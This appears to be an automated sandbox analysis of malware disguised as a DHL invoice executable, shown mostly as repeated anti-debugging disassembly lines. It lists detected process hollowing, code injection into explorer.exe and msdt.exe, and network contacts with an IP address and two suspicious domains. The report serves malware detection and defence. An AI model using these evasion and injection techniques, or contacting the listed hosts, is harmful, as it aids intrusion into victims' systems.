          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014776E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014916E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014FFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01530EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01530EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01530EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0491849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04909080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04983884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04983884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0493F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0493F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0493F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049490AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0499B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0499B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0499B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0499B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0499B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0499B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049D8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049C14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04986CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04986CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04986CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049058EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049D4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049D4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04987016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04987016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04987016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049D740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049D740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049D740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04986C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04986C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04986C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04986C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049C1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0491B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0491B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0491B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0491B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0493002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0493002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0493002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0493002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0493002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0493BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04920050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04920050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0499C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0499C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0493A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049D1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049C2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0492746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04932990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0493FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0493FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0492C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04932581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04932581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04932581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04932581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0493A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04902D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04902D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04902D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04902D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04902D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04931DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04931DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04931DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049D05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049D05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049335A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049361A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049361A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049869A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04986DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04986DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04986DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04986DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04986DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04986DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049B8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0490B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0490B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0490B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049941E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0491D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0491D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049CFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049CFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049CFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049CFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04909100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04909100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04909100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0490AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04913D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04913D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04913D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04913D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04913D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04913D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04913D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04913D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04913D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04913D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04913D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04913D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04913D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049CE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04934D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04934D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04934D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049D8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0493513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0493513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0498A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04924120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04924120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04924120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04924120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04924120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04927D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0492B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0492B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04943D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04983540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0490B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0490B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0492C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0492C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0490C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0493D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0493D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0499FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0491AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0491AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0493FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049D0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049D0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049D0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049846A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049D8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04948EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04932ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049BFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049336CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049316E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049176E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04932AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04905210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04905210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04905210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04905210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0490AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0490AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04923A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0493A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0493A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0490C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0490C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0490C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04938E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049C1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04918A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049BFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0490E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04944A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04944A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049CEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04994257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04909240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04909240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04909240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04909240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04917E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04917E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04917E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04917E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04917E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04917E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049CAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049CAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0492AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0492AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0492AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0492AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0492AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0494927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049BB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049BB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0491766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049D8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0493B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04932397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04918794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04987794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04987794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04987794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\msdt.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0040ACF0 LdrLoadDll,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 44.227.76.166 80
          Source: C:\Windows\explorer.exeDomain query: www.mimamincloor.com
          Source: C:\Windows\explorer.exeDomain query: www.federaldados.design
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeSection unmapped: C:\Windows\SysWOW64\msdt.exe base address: B30000
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeMemory written: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeThread register set: target process: 3440
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeThread register set: target process: 3440
          Source: C:\Windows\SysWOW64\msdt.exeThread register set: target process: 3440
